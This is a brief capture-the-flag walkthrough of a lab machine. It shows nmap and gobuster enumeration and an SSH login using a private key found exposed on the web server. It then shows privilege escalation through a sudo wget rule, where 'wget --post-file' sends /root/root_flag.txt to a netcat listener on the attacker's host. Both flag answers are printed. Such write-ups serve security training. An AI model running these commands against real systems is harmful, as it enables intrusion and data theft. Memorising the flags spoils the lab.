Can you exfiltrate the root flag?
Scan ports using nmap
nmap -A -T4 10.10.200.215
We found 2 open ports 22 (ssh) and 80 (http)
We access the web service by http on port 80
View source and we can see a announcement on line 278
"jessie" is name of 1 user on the server
We use gobuster to enummerate directory on web server
gobuster dir -u http://10.10.200.215/ -w /usr/share/wordlists/dirb/common.txt -t 30
We access to /sitemap/ directory, we find a corporate web
We try gobuster against this page
gobuster dir -u http://10.10.200.215/sitemap/ -w /usr/share/wordlists/dirb/common.txt -t 30
we found ".ssh" directory with id_rsa file
We can ssh with "jessie" user using id_rsa file
wget http://10.10.200.215/sitemap/.ssh/id_rsa
chmod 600 id_rsa
ssh [email protected] -i id_rsa
find . -name *flag*
| Flag | User flag |
|---|---|
| Answer | 057c67131c3d5e42dd5cd3075b198ff6 |
sudo -l -l
Only user/bin/wget allowed as suoder
We we put a netcat listening and use the flag "wget --post-file" to get root flag
nc -lvnp 4444
# another terminal
sudo /usr/bin/wget --post-file=/root/root_flag.txt 10.10.149.210:4444
And just like that, I got the root_flag.txt
| Flag | Root flag |
|---|---|
| Answer | b1b968b37519ad1daa6408188649263d |